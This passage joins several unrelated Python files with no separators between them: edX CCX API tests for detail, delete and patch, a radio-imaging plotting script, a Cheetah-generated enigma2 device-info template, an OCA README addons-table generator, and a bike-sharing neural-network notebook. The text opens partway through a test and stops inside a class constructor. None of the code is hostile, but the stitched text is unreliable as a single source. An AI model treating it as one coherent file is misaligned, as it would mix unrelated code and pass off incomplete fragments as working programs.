self.expect_error(status.HTTP_400_BAD_REQUEST, 'course_id_not_valid_ccx_id', resp)
# use a non-existing ccx id
url = reverse('ccx_api:v0:ccx:detail', kwargs={'ccx_course_id': 'ccx-v1:foo.0+course_bar_0+Run_0+ccx@1'})
# the permission class will give a 403 error because it will not find the CCX
resp = client_request(url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_403_FORBIDDEN)
# bypassing the permission class we get another kind of error
with mock.patch(mock_class_str, autospec=True) as mocked_perm_class:
mocked_perm_class.return_value = True
resp = client_request(url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.expect_error(status.HTTP_404_NOT_FOUND, 'ccx_course_id_does_not_exist', resp)
# get a valid ccx key and add a few 0s to get a non-existing ccx for a valid course
ccx_key_str = '{0}000000'.format(self.ccx_key_str)
url = reverse('ccx_api:v0:ccx:detail', kwargs={'ccx_course_id': ccx_key_str})
# the permission class will give a 403 error because it will not find the CCX
resp = client_request(url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_403_FORBIDDEN)
# bypassing the permission class we get another kind of error
with mock.patch(mock_class_str, autospec=True) as mocked_perm_class:
mocked_perm_class.return_value = True
resp = client_request(url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.expect_error(status.HTTP_404_NOT_FOUND, 'ccx_course_id_does_not_exist', resp)
@ddt.data(*AUTH_ATTRS)
def test_get_detail(self, auth_attr):
"""
Test for getting detail of a ccx course
"""
resp = self.client.get(self.detail_url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_200_OK)
self.assertEqual(resp.data.get('ccx_course_id'), self.ccx_key_str) # pylint: disable=no-member
self.assertEqual(resp.data.get('display_name'), self.ccx.display_name) # pylint: disable=no-member
self.assertEqual(
resp.data.get('max_students_allowed'), # pylint: disable=no-member
self.ccx.max_student_enrollments_allowed # pylint: disable=no-member
)
self.assertEqual(resp.data.get('coach_email'), self.ccx.coach.email) # pylint: disable=no-member
self.assertEqual(resp.data.get('master_course_id'), unicode(self.ccx.course_id)) # pylint: disable=no-member
self.assertItemsEqual(resp.data.get('course_modules'), self.master_course_chapters) # pylint: disable=no-member
@ddt.data(*AUTH_ATTRS)
def test_delete_detail(self, auth_attr):
"""
Test for deleting a ccx course
"""
# check that there are overrides
self.assertGreater(CcxFieldOverride.objects.filter(ccx=self.ccx).count(), 0)
self.assertGreater(CourseEnrollment.objects.filter(course_id=self.ccx_key).count(), 0)
resp = self.client.delete(self.detail_url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT)
self.assertIsNone(resp.data) # pylint: disable=no-member
# the CCX does not exist any more
with self.assertRaises(CustomCourseForEdX.DoesNotExist):
CustomCourseForEdX.objects.get(id=self.ccx.id)
# check that there are no overrides
self.assertEqual(CcxFieldOverride.objects.filter(ccx=self.ccx).count(), 0)
self.assertEqual(CourseEnrollment.objects.filter(course_id=self.ccx_key).count(), 0)
@ddt.data(*AUTH_ATTRS)
def test_patch_detail_change_master_course(self, auth_attr):
"""
Test to patch a ccx course to change a master course
"""
data = {
'master_course_id': 'changed_course_id'
}
resp = self.client.patch(self.detail_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.expect_error(status.HTTP_403_FORBIDDEN, 'master_course_id_change_not_allowed', resp)
@ddt.data(
(
{
'max_students_allowed': None,
'display_name': None,
'coach_email': None
},
{
'max_students_allowed': 'null_field_max_students_allowed',
'display_name': 'null_field_display_name',
'coach_email': 'null_field_coach_email'
},
AUTH_ATTRS[0]
),
(
{
'max_students_allowed': None,
'display_name': None,
'coach_email': None
},
{
'max_students_allowed': 'null_field_max_students_allowed',
'display_name': 'null_field_display_name',
'coach_email': 'null_field_coach_email'
},
AUTH_ATTRS[1]
),
(
{'coach_email': 'this is not an [email protected]'},
{'coach_email': 'invalid_coach_email'},
AUTH_ATTRS[0]
),
(
{'coach_email': 'this is not an [email protected]'},
{'coach_email': 'invalid_coach_email'},
AUTH_ATTRS[1]
),
(
{'display_name': ''},
{'display_name': 'invalid_display_name'},
AUTH_ATTRS[0]
),
(
{'display_name': ''},
{'display_name': 'invalid_display_name'},
AUTH_ATTRS[1]
),
(
{'max_students_allowed': 'a'},
{'max_students_allowed': 'invalid_max_students_allowed'},
AUTH_ATTRS[0]
),
(
{'max_students_allowed': 'a'},
{'max_students_allowed': 'invalid_max_students_allowed'},
AUTH_ATTRS[1]
),
(
{'course_modules': {'foo': 'bar'}},
{'course_modules': 'invalid_course_module_list'},
AUTH_ATTRS[0]
),
(
{'course_modules': {'foo': 'bar'}},
{'course_modules': 'invalid_course_module_list'},
AUTH_ATTRS[1]
),
(
{'course_modules': 'block-v1:org.0+course_0+Run_0+type@chapter+block@chapter_1'},
{'course_modules': 'invalid_course_module_list'},
AUTH_ATTRS[0]
),
(
{'course_modules': 'block-v1:org.0+course_0+Run_0+type@chapter+block@chapter_1'},
{'course_modules': 'invalid_course_module_list'},
AUTH_ATTRS[1]
),
(
{'course_modules': ['foo', 'bar']},
{'course_modules': 'invalid_course_module_keys'},
AUTH_ATTRS[0]
),
(
{'course_modules': ['foo', 'bar']},
{'course_modules': 'invalid_course_module_keys'},
AUTH_ATTRS[1]
),
)
@ddt.unpack
def test_patch_detail_wrong_input_data(self, data, expected_errors, auth_attr):
"""
Test for different wrong inputs for the patch method
"""
resp = self.client.patch(self.detail_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.expect_error_fields(expected_errors, resp)
@ddt.data(*AUTH_ATTRS)
def test_empty_patch(self, auth_attr):
"""
An empty patch does not modify anything
"""
display_name = self.ccx.display_name
max_students_allowed = self.ccx.max_student_enrollments_allowed # pylint: disable=no-member
coach_email = self.ccx.coach.email # pylint: disable=no-member
ccx_structure = self.ccx.structure # pylint: disable=no-member
resp = self.client.patch(self.detail_url, {}, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT)
ccx = CustomCourseForEdX.objects.get(id=self.ccx.id)
self.assertEqual(display_name, ccx.display_name)
self.assertEqual(max_students_allowed, ccx.max_student_enrollments_allowed)
self.assertEqual(coach_email, ccx.coach.email)
self.assertEqual(ccx_structure, ccx.structure)
@ddt.data(*AUTH_ATTRS)
def test_patch_detail_coach_does_not_exist(self, auth_attr):
"""
Specific test for the case when the input data is valid but the coach does not exist.
"""
data = {
'max_students_allowed': 111,
'display_name': 'CCX Title',
'coach_email': '[email protected]'
}
resp = self.client.patch(self.detail_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.expect_error(status.HTTP_404_NOT_FOUND, 'coach_user_does_not_exist', resp)
@ddt.data(*AUTH_ATTRS)
def test_patch_detail_wrong_modules(self, auth_attr):
"""
Specific test for the case when the input data is valid but the
course modules do not belong to the master course
"""
data = {
'course_modules': [
'block-v1:org.0+course_0+Run_0+type@chapter+block@chapter_foo',
'block-v1:org.0+course_0+Run_0+type@chapter+block@chapter_bar'
]
}
resp = self.client.patch(self.detail_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.expect_error(status.HTTP_400_BAD_REQUEST, 'course_module_list_not_belonging_to_master_course', resp)
@ddt.data(*AUTH_ATTRS)
def test_patch_detail_mixed_wrong_and_valid_modules(self, auth_attr):
"""
Specific test for the case when the input data is valid but some of
the course modules do not belong to the master course
"""
modules = self.master_course_chapters[0:1] + ['block-v1:org.0+course_0+Run_0+type@chapter+block@chapter_foo']
data = {
'course_modules': modules
}
resp = self.client.patch(self.detail_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.expect_error(status.HTTP_400_BAD_REQUEST, 'course_module_list_not_belonging_to_master_course', resp)
@ddt.data(*AUTH_ATTRS)
def test_patch_detail(self, auth_attr):
"""
Test for successful patch
"""
outbox = self.get_outbox()
# create a new coach
new_coach = AdminFactory.create()
data = {
'max_students_allowed': 111,
'display_name': 'CCX Title',
'coach_email': new_coach.email
}
resp = self.client.patch(self.detail_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT)
ccx_from_db = CustomCourseForEdX.objects.get(id=self.ccx.id)
self.assertEqual(ccx_from_db.max_student_enrollments_allowed, data['max_students_allowed'])
self.assertEqual(ccx_from_db.display_name, data['display_name'])
self.assertEqual(ccx_from_db.coach.email, data['coach_email'])
# check that the coach user has coach role on the master course
coach_role_on_master_course = CourseCcxCoachRole(self.master_course_key)
self.assertTrue(coach_role_on_master_course.has_user(new_coach))
# check that the coach has been enrolled in the ccx
ccx_course_object = courses.get_course_by_id(self.ccx_key)
self.assertTrue(
CourseEnrollment.objects.filter(course_id=ccx_course_object.id, user=new_coach).exists()
)
# check that an email has been sent to the coach
self.assertEqual(len(outbox), 1)
self.assertIn(new_coach.email, outbox[0].recipients()) # pylint: disable=no-member
@ddt.data(*AUTH_ATTRS)
def test_patch_detail_modules(self, auth_attr):
"""
Specific test for successful patch of the course modules
"""
data = {'course_modules': self.master_course_chapters[0:1]}
resp = self.client.patch(self.detail_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT)
ccx_from_db = CustomCourseForEdX.objects.get(id=self.ccx.id)
self.assertItemsEqual(ccx_from_db.structure, data['course_modules'])
data = {'course_modules': []}
resp = self.client.patch(self.detail_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT)
ccx_from_db = CustomCourseForEdX.objects.get(id=self.ccx.id)
self.assertItemsEqual(ccx_from_db.structure, [])
data = {'course_modules': self.master_course_chapters}
resp = self.client.patch(self.detail_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT)
ccx_from_db = CustomCourseForEdX.objects.get(id=self.ccx.id)
self.assertItemsEqual(ccx_from_db.structure, self.master_course_chapters)
data = {'course_modules': None}
resp = self.client.patch(self.detail_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT)
ccx_from_db = CustomCourseForEdX.objects.get(id=self.ccx.id)
self.assertEqual(ccx_from_db.structure, None)
chapters = self.master_course_chapters[0:1]
data = {'course_modules': chapters * 3}
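        # duplicate module ids in the payload should be stored only once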
resp = self.client.patch(self.detail_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT)
ccx_from_db = CustomCourseForEdX.objects.get(id=self.ccx.id)
self.assertItemsEqual(ccx_from_db.structure, chapters)
@ddt.data(
('auth', True),
('auth', False),
('auth_header_oauth2_provider', True),
('auth_header_oauth2_provider', False)
)
@ddt.unpack
def test_patch_user_on_active_state(self, auth_attr, user_is_active):
"""
Test patch ccx course on user's active state.
"""
self.app_user.is_active = user_is_active
self.app_user.save() # pylint: disable=no-member
chapters = self.master_course_chapters[0:1]
data = {'course_modules': chapters * 3}
resp = self.client.patch(self.detail_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr))
if not user_is_active:
self.assertEqual(resp.status_code, status.HTTP_403_FORBIDDEN)
else:
self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT)
ccx_from_db = CustomCourseForEdX.objects.get(id=self.ccx.id)
self.assertItemsEqual(ccx_from_db.structure, chapters)
@ddt.data(
('auth', True),
('auth', False),
('auth_header_oauth2_provider', True),
('auth_header_oauth2_provider', False)
)
@ddt.unpack
def test_delete_detail_on_active_state(self, auth_attr, user_is_active):
"""
Test for deleting a ccx course on user's active state.
"""
self.app_user.is_active = user_is_active
self.app_user.save() # pylint: disable=no-member
# check that there are overrides
self.assertGreater(CcxFieldOverride.objects.filter(ccx=self.ccx).count(), 0)
self.assertGreater(CourseEnrollment.objects.filter(course_id=self.ccx_key).count(), 0)
resp = self.client.delete(self.detail_url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr))
if not user_is_active:
self.assertEqual(resp.status_code, status.HTTP_403_FORBIDDEN)
else:
self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT)
self.assertIsNone(resp.data) # pylint: disable=no-member
# the CCX does not exist any more
with self.assertRaises(CustomCourseForEdX.DoesNotExist):
CustomCourseForEdX.objects.get(id=self.ccx.id)
# check that there are no overrides
self.assertEqual(CcxFieldOverride.objects.filter(ccx=self.ccx).count(), 0)
self.assertEqual(CourseEnrollment.objects.filter(course_id=self.ccx_key).count(), 0)
#!/usr/bin/env python3
import sys
import numpy as np
from arthur.imaging import full_calculation, calculate_lag
from arthur.io import read_full
from arthur.plot import plot_image, plot_lag, plot_chan_power, plot_corr_mat, plot_diff
from arthur.constants import NUM_CHAN
from matplotlib import pyplot
FRQ = 58398437.5 # Central observation frequency in Hz
def main():
if len(sys.argv) < 2:
print("Image the first set of visibilites from a visibilities file")
print()
print("usage: {} <file>".format(sys.argv[0]))
sys.exit(1)
else:
path = sys.argv[1]
    # define these here so we can access them outside the for-loop scope
lags = []
prev_data = date = img_data = corr_data = diff_data = None
chan_data = np.zeros((NUM_CHAN, 60), dtype=np.float32)
for date, body in read_full(path):
img_data, corr_data, chan_row = full_calculation(body, FRQ)
lags += [calculate_lag(date).seconds]
if prev_data is None:
prev_data = img_data
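        # chan_data is a rolling "waterfall" buffer: shift it one column and
        # store the newest per-channel powers in the first column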
chan_data = np.roll(chan_data, 1)
chan_data[:, 0] = chan_row
diff_data = img_data - prev_data
prev_data = img_data
fig_img = plot_image(date, img_data, FRQ)
fig_lag = plot_lag(lags)
fig_chan = plot_chan_power(chan_data)
fig_cm = plot_corr_mat(corr_data, FRQ, date)
fig_diff = plot_diff(diff_data, FRQ, date)
pyplot.show()
if __name__ == '__main__':
main()
#!/usr/bin/env python
##################################################
## DEPENDENCIES
import sys
import os
import os.path
try:
import builtins as builtin
except ImportError:
import __builtin__ as builtin
from os.path import getmtime, exists
import time
import types
from Cheetah.Version import MinCompatibleVersion as RequiredCheetahVersion
from Cheetah.Version import MinCompatibleVersionTuple as RequiredCheetahVersionTuple
from Cheetah.Template import Template
from Cheetah.DummyTransaction import *
from Cheetah.NameMapper import NotFound, valueForName, valueFromSearchList, valueFromFrameOrSearchList
from Cheetah.CacheRegion import CacheRegion
import Cheetah.Filters as Filters
import Cheetah.ErrorCatchers as ErrorCatchers
##################################################
## MODULE CONSTANTS
VFFSL=valueFromFrameOrSearchList
VFSL=valueFromSearchList
VFN=valueForName
currentTime=time.time
__CHEETAH_version__ = '2.4.4'
__CHEETAH_versionTuple__ = (2, 4, 4, 'development', 0)
__CHEETAH_genTime__ = 1364979192.551085
__CHEETAH_genTimestamp__ = 'Wed Apr 3 17:53:12 2013'
__CHEETAH_src__ = '/home/fermi/Work/Model/tmsingle/openpli3.0/build-tmsingle/tmp/work/mips32el-oe-linux/enigma2-plugin-extensions-openwebif-0.1+git1+279a2577c3bc6defebd4bf9e61a046dcf7f37c01-r0.72/git/plugin/controllers/views/web/deviceinfo.tmpl'
__CHEETAH_srcLastModified__ = 'Wed Apr 3 17:10:17 2013'
__CHEETAH_docstring__ = 'Autogenerated by Cheetah: The Python-Powered Template Engine'
if __CHEETAH_versionTuple__ < RequiredCheetahVersionTuple:
raise AssertionError(
'This template was compiled with Cheetah version'
' %s. Templates compiled before version %s must be recompiled.'%(
__CHEETAH_version__, RequiredCheetahVersion))
##################################################
## CLASSES
class deviceinfo(Template):
##################################################
## CHEETAH GENERATED METHODS
def __init__(self, *args, **KWs):
super(deviceinfo, self).__init__(*args, **KWs)
if not self._CHEETAH__instanceInitialized:
cheetahKWArgs = {}
allowedKWs = 'searchList namespaces filter filtersLib errorCatcher'.split()
for k,v in KWs.items():
if k in allowedKWs: cheetahKWArgs[k] = v
self._initCheetahInstance(**cheetahKWArgs)
def respond(self, trans=None):
## CHEETAH: main method generated for this template
if (not trans and not self._CHEETAH__isBuffering and not callable(self.transaction)):
trans = self.transaction # is None unless self.awake() was called
if not trans:
trans = DummyTransaction()
_dummyTrans = True
else: _dummyTrans = False
write = trans.response().write
SL = self._CHEETAH__searchList
_filter = self._CHEETAH__currentFilter
########################################
## START - generated method body
_orig_filter_63410281 = _filter
filterName = u'WebSafe'
if self._CHEETAH__filters.has_key("WebSafe"):
_filter = self._CHEETAH__currentFilter = self._CHEETAH__filters[filterName]
else:
_filter = self._CHEETAH__currentFilter = \
self._CHEETAH__filters[filterName] = getattr(self._CHEETAH__filtersLib, filterName)(self).filter
write(u'''<?xml version="1.0" encoding="UTF-8"?>
<e2deviceinfo>
\t<e2enigmaversion>''')
_v = VFFSL(SL,"enigmaver",True) # u'$enigmaver' on line 4, col 19
if _v is not None: write(_filter(_v, rawExpr=u'$enigmaver')) # from line 4, col 19.
write(u'''</e2enigmaversion>
\t<e2imageversion>''')
_v = VFFSL(SL,"imagever",True) # u'$imagever' on line 5, col 18
if _v is not None: write(_filter(_v, rawExpr=u'$imagever')) # from line 5, col 18.
write(u'''</e2imageversion>
\t<e2webifversion>''')
_v = VFFSL(SL,"webifver",True) # u'$webifver' on line 6, col 18
if _v is not None: write(_filter(_v, rawExpr=u'$webifver')) # from line 6, col 18.
write(u'''</e2webifversion>
\t<e2fpversion>''')
_v = VFFSL(SL,"str",False)(VFFSL(SL,"fp_version",True)) # u'$str($fp_version)' on line 7, col 15
if _v is not None: write(_filter(_v, rawExpr=u'$str($fp_version)')) # from line 7, col 15.
write(u'''</e2fpversion>
\t<e2devicename>''')
_v = VFFSL(SL,"model",True) # u'$model' on line 8, col 16
if _v is not None: write(_filter(_v, rawExpr=u'$model')) # from line 8, col 16.
write(u'''</e2devicename>
\t<e2frontends>
''')
for tuner in VFFSL(SL,"tuners",True): # generated from line 10, col 3
write(u'''\t\t<e2frontend>
\t\t\t<e2name>''')
_v = VFFSL(SL,"tuner.name",True) # u'$tuner.name' on line 12, col 12
if _v is not None: write(_filter(_v, rawExpr=u'$tuner.name')) # from line 12, col 12.
write(u'''</e2name>
\t\t\t<e2model>''')
_v = VFFSL(SL,"tuner.type",True) # u'$tuner.type' on line 13, col 13
if _v is not None: write(_filter(_v, rawExpr=u'$tuner.type')) # from line 13, col 13.
write(u'''</e2model>
\t\t</e2frontend>
''')
write(u'''\t</e2frontends>
\t<e2network>
''')
for iface in VFFSL(SL,"ifaces",True): # generated from line 18, col 3
write(u'''\t\t<e2interface>
\t\t\t<e2name>''')
_v = VFFSL(SL,"iface.name",True) # u'$iface.name' on line 20, col 12
if _v is not None: write(_filter(_v, rawExpr=u'$iface.name')) # from line 20, col 12.
write(u'''</e2name>
\t\t\t<e2mac>''')
_v = VFFSL(SL,"iface.mac",True) # u'$iface.mac' on line 21, col 11
if _v is not None: write(_filter(_v, rawExpr=u'$iface.mac')) # from line 21, col 11.
write(u'''</e2mac>
\t\t\t<e2dhcp>''')
_v = VFFSL(SL,"iface.dhcp",True) # u'$iface.dhcp' on line 22, col 12
if _v is not None: write(_filter(_v, rawExpr=u'$iface.dhcp')) # from line 22, col 12.
write(u'''</e2dhcp>
\t\t\t<e2ip>''')
_v = VFFSL(SL,"iface.ip",True) # u'$iface.ip' on line 23, col 10
if _v is not None: write(_filter(_v, rawExpr=u'$iface.ip')) # from line 23, col 10.
write(u'''</e2ip>
\t\t\t<e2gateway>''')
_v = VFFSL(SL,"iface.gw",True) # u'$iface.gw' on line 24, col 15
if _v is not None: write(_filter(_v, rawExpr=u'$iface.gw')) # from line 24, col 15.
write(u'''</e2gateway>
\t\t\t<e2netmask>''')
_v = VFFSL(SL,"iface.mask",True) # u'$iface.mask' on line 25, col 15
if _v is not None: write(_filter(_v, rawExpr=u'$iface.mask')) # from line 25, col 15.
write(u'''</e2netmask>
\t\t</e2interface>
''')
write(u'''\t</e2network>
\t<e2hdds>
''')
for hd in VFFSL(SL,"hdd",True): # generated from line 30, col 3
write(u'''\t\t<e2hdd>
\t\t\t<e2model>''')
_v = VFFSL(SL,"hd.model",True) # u'$hd.model' on line 32, col 13
if _v is not None: write(_filter(_v, rawExpr=u'$hd.model')) # from line 32, col 13.
write(u'''</e2model>
\t\t\t<e2capacity>''')
_v = VFFSL(SL,"hd.capacity",True) # u'$hd.capacity' on line 33, col 16
if _v is not None: write(_filter(_v, rawExpr=u'$hd.capacity')) # from line 33, col 16.
write(u'''</e2capacity>
\t\t\t<e2free>''')
_v = VFFSL(SL,"hd.free",True) # u'$hd.free' on line 34, col 12
if _v is not None: write(_filter(_v, rawExpr=u'$hd.free')) # from line 34, col 12.
write(u'''</e2free>
\t\t</e2hdd>
''')
write(u'''\t</e2hdds>
</e2deviceinfo>
''')
_filter = self._CHEETAH__currentFilter = _orig_filter_63410281
########################################
## END - generated method body
return _dummyTrans and trans.response().getvalue() or ""
##################################################
## CHEETAH GENERATED ATTRIBUTES
_CHEETAH__instanceInitialized = False
_CHEETAH_version = __CHEETAH_version__
_CHEETAH_versionTuple = __CHEETAH_versionTuple__
_CHEETAH_genTime = __CHEETAH_genTime__
_CHEETAH_genTimestamp = __CHEETAH_genTimestamp__
_CHEETAH_src = __CHEETAH_src__
_CHEETAH_srcLastModified = __CHEETAH_srcLastModified__
_mainCheetahMethod_for_deviceinfo= 'respond'
## END CLASS DEFINITION
if not hasattr(deviceinfo, '_initCheetahAttributes'):
templateAPIClass = getattr(deviceinfo, '_CHEETAH_templateClass', Template)
templateAPIClass._addCheetahPlumbingCodeToClass(deviceinfo)
# CHEETAH was developed by Tavis Rudd and Mike Orr
# with code, advice and input from many other volunteers.
# For more information visit http://www.CheetahTemplate.org/
##################################################
## if run from command line:
if __name__ == '__main__':
from Cheetah.TemplateCmdLineIface import CmdLineIface
CmdLineIface(templateObj=deviceinfo()).run()
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# License AGPLv3 (http://www.gnu.org/licenses/agpl-3.0-standalone.html)
"""
This script replaces markers in the README.md files
of an OCA repository with the list of addons present
in the repository. It preserves the marker so it
can be run again.
The script must be run from the root of the repository,
where the README.md file can be found.
Markers in README.md must have the form:
[//]: # (addons)
(the content between the markers does not matter; it will be replaced by the script)
[//]: # (end addons)
"""
from __future__ import print_function
import ast
import io
import logging
import os
import re
import click
from .gitutils import commit_if_needed
_logger = logging.getLogger(__name__)
MARKERS = r'(\[//\]: # \(addons\))|(\[//\]: # \(end addons\))'
MANIFESTS = ('__openerp__.py', '__manifest__.py')
def sanitize_cell(s):
if not s:
return ''
s = ' '.join(s.split())
return s
def render_markdown_table(header, rows):
table = []
rows = [header, ['---'] * len(header)] + rows
for row in rows:
table.append(' | '.join(row))
return '\n'.join(table)
def replace_in_readme(readme_path, header, rows_available, rows_unported):
with io.open(readme_path, encoding='utf8') as f:
readme = f.read()
parts = re.split(MARKERS, readme, flags=re.MULTILINE)
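    # MARKERS has two capture groups, so a successful split produces 7 parts:
    # [before, start marker, None, content between markers, None, end marker, after]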
if len(parts) != 7:
_logger.warning('Addons markers not found or incorrect in %s',
readme_path)
return
addons = []
if rows_available:
addons.extend([
'\n',
'\n',
'Available addons\n',
'----------------\n',
render_markdown_table(header, rows_available),
'\n'
])
if rows_unported:
addons.extend([
'\n',
'\n',
'Unported addons\n',
'---------------\n',
render_markdown_table(header, rows_unported),
'\n'
])
addons.append('\n')
parts[2:5] = addons
readme = ''.join(parts)
with io.open(readme_path, 'w', encoding='utf8') as f:
f.write(readme)
@click.command()
@click.option('--commit/--no-commit',
help="git commit changes to README.rst, if any.")
def gen_addons_table(commit):
readme_path = 'README.md'
if not os.path.isfile(readme_path):
_logger.warning('%s not found', readme_path)
return
# list addons in . and __unported__
addon_paths = [] # list of (addon_path, unported)
for addon_path in os.listdir('.'):
addon_paths.append((addon_path, False))
unported_directory = '__unported__'
if os.path.isdir(unported_directory):
for addon_path in os.listdir(unported_directory):
addon_path = os.path.join(unported_directory, addon_path)
addon_paths.append((addon_path, True))
addon_paths = sorted(addon_paths, key=lambda x: x[0])
# load manifests
header = ('addon', 'version', 'summary')
rows_available = []
rows_unported = []
for addon_path, unported in addon_paths:
for manifest_file in MANIFESTS:
manifest_path = os.path.join(addon_path, manifest_file)
has_manifest = os.path.isfile(manifest_path)
if has_manifest:
break
if has_manifest:
with open(manifest_path) as f:
manifest = ast.literal_eval(f.read())
addon_name = os.path.basename(addon_path)
link = '[%s](%s/)' % (addon_name, addon_path)
version = manifest.get('version') or ''
summary = manifest.get('summary') or manifest.get('name')
summary = sanitize_cell(summary)
installable = manifest.get('installable', True)
if unported and installable:
_logger.warning('%s is in __unported__ but is marked '
'installable.' % addon_path)
installable = False
if installable:
rows_available.append((link, version, summary))
else:
rows_unported.append((link, version + ' (unported)', summary))
# replace table in README.md
replace_in_readme(readme_path, header, rows_available, rows_unported)
if commit:
commit_if_needed(
[readme_path],
'[UPD] addons table in README.md',
)
if __name__ == '__main__':
gen_addons_table()
# coding: utf-8
# # Your First Neural Network
#
# In this project, you'll build your first neural network and use it to predict daily bike rental ridership. We've provided some of the code, but the implementation of the neural network is (mostly) left to you. After submitting this project, feel free to explore the data and the model further.
# In[1]:
get_ipython().magic('matplotlib inline')
get_ipython().magic("config InlineBackend.figure_format = 'retina'")
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
# ## Load and Prepare the Data
#
# A critical step in building a neural network is preparing the data correctly. Variables on different scales make it hard for the network to efficiently learn the correct weights. We've provided the code to load and prepare the data below. You'll learn more about this soon!
# In[3]:
data_path = 'Bike-Sharing-Dataset/hour.csv'
rides = pd.read_csv(data_path)
# In[4]:
rides.head()
# ## Data Overview
#
# This dataset contains the hourly count of riders for every day from January 1, 2011 through December 31, 2012. Riders are split into casual and registered users, and the cnt column is the aggregate rider count. You can see the first few rows of the data above.
#
# The plot below shows the number of riders over roughly the first 10 days in the dataset (some days don't have exactly 24 entries, so it isn't exactly 10 days). You can see the hourly rentals here. This data is complicated! Ridership is lower on weekends, and it peaks during commuting hours on weekdays. The data above also includes temperature, humidity, and wind speed, all of which affect the number of riders. Your model will need to account for all of this.
# In[5]:
rides[:24*10].plot(x='dteday', y='cnt')
# ### Dummy Variables
#
# Below are some categorical variables such as season, weather, and month. To include these in our model we need to create binary dummy variables, which is easy to do with Pandas' `get_dummies()`.
# In[6]:
dummy_fields = ['season', 'weathersit', 'mnth', 'hr', 'weekday']
for each in dummy_fields:
dummies = pd.get_dummies(rides[each], prefix=each, drop_first=False)
rides = pd.concat([rides, dummies], axis=1)
fields_to_drop = ['instant', 'dteday', 'season', 'weathersit',
'weekday', 'atemp', 'mnth', 'workingday', 'hr']
data = rides.drop(fields_to_drop, axis=1)
data.head()
# ### Scaling the Target Variables
#
# To make training the network easier, we standardize each of the continuous variables: we shift and scale the variables so that they have zero mean and a standard deviation of 1.
#
# We save the scaling factors so we can undo the transformation when we use the network for predictions.
# In[7]:
quant_features = ['casual', 'registered', 'cnt', 'temp', 'hum', 'windspeed']
# Store scalings in a dictionary so we can convert back later
scaled_features = {}
for each in quant_features:
mean, std = data[each].mean(), data[each].std()
scaled_features[each] = [mean, std]
data.loc[:, each] = (data[each] - mean)/std
# ### Splitting the Data into Training, Testing, and Validation Sets
#
# We save roughly the last 21 days of data as a test set to use after the network is trained. We'll use this set to make predictions and compare them with the actual ridership.
# In[8]:
# Save data for approximately the last 21 days
test_data = data[-21*24:]
# Now remove the test data from the data set
data = data[:-21*24]
# Separate the data into features and targets
target_fields = ['cnt', 'casual', 'registered']
features, targets = data.drop(target_fields, axis=1), data[target_fields]
test_features, test_targets = test_data.drop(target_fields, axis=1), test_data[target_fields]
# We split the data into two sets: one for training and one for validating the network after it has been trained. Because the data is time-ordered, we train on historical data and then try to predict future data (the validation set).
# In[9]:
# Hold out the last 60 days or so of the remaining data as a validation set
train_features, train_targets = features[:-60*24], targets[:-60*24]
val_features, val_targets = features[-60*24:], targets[-60*24:]
# ## Build the Network
#
# Below you'll build your own network. We've built the structure and the backward pass. You'll implement the forward pass through the network. You'll also set the hyperparameters: the learning rate, the number of hidden units, and the number of training passes.
#
# <img src="assets/neural_network.png" width=300px>
#
# The network has two layers, a hidden layer and an output layer. The hidden layer uses the sigmoid function as its activation function. The output layer has only one node and is used for regression: the node's output is the same as its input. That is, the activation function is $f(x)=x$. A function that takes an input signal and generates an output signal while taking a threshold into account is called an activation function. We work through each layer of the network, computing the output of every neuron. All the outputs of one layer become the inputs to the neurons of the next layer. This process is called forward propagation.
#
# We use weights to propagate signals from the input layer to the output layer in the neural network. We also use weights to propagate the error backwards from the output layer through the network in order to update the weights. This is called backpropagation.
#
# > **Hint**: For backpropagation you need to implement the derivative of the output activation function ($f(x) = x$). If you aren't familiar with calculus, this function is simply equivalent to the equation $y = x$. What is the slope of that equation? That is the derivative of $f(x)$.
#
#
# You need to complete the following tasks:
#
# 1. Implement the sigmoid activation function. Set `self.activation_function` in `__init__` to your sigmoid function.
# 2. Implement the forward pass in the `train` method.
# 3. Implement the backpropagation algorithm in the `train` method, including computing the output error.
# 4. Implement the forward pass in the `run` method.
#
#
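# (Worked out: $f(x) = x$ is a straight line with slope 1, so its derivative is $f'(x) = 1$; this is why the output error term in the code below is simply `error * 1`.)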
# In[26]:
class NeuralNetwork(object):
def __init__(self, input_nodes, hidden_nodes, output_nodes, learning_rate):
# Set number of nodes in input, hidden and output layers.
self.input_nodes = input_nodes
self.hidden_nodes = hidden_nodes
self.output_nodes = output_nodes
# Initialize weights
self.weights_input_to_hidden = np.random.normal(0.0, self.input_nodes**-0.5,
(self.input_nodes, self.hidden_nodes))
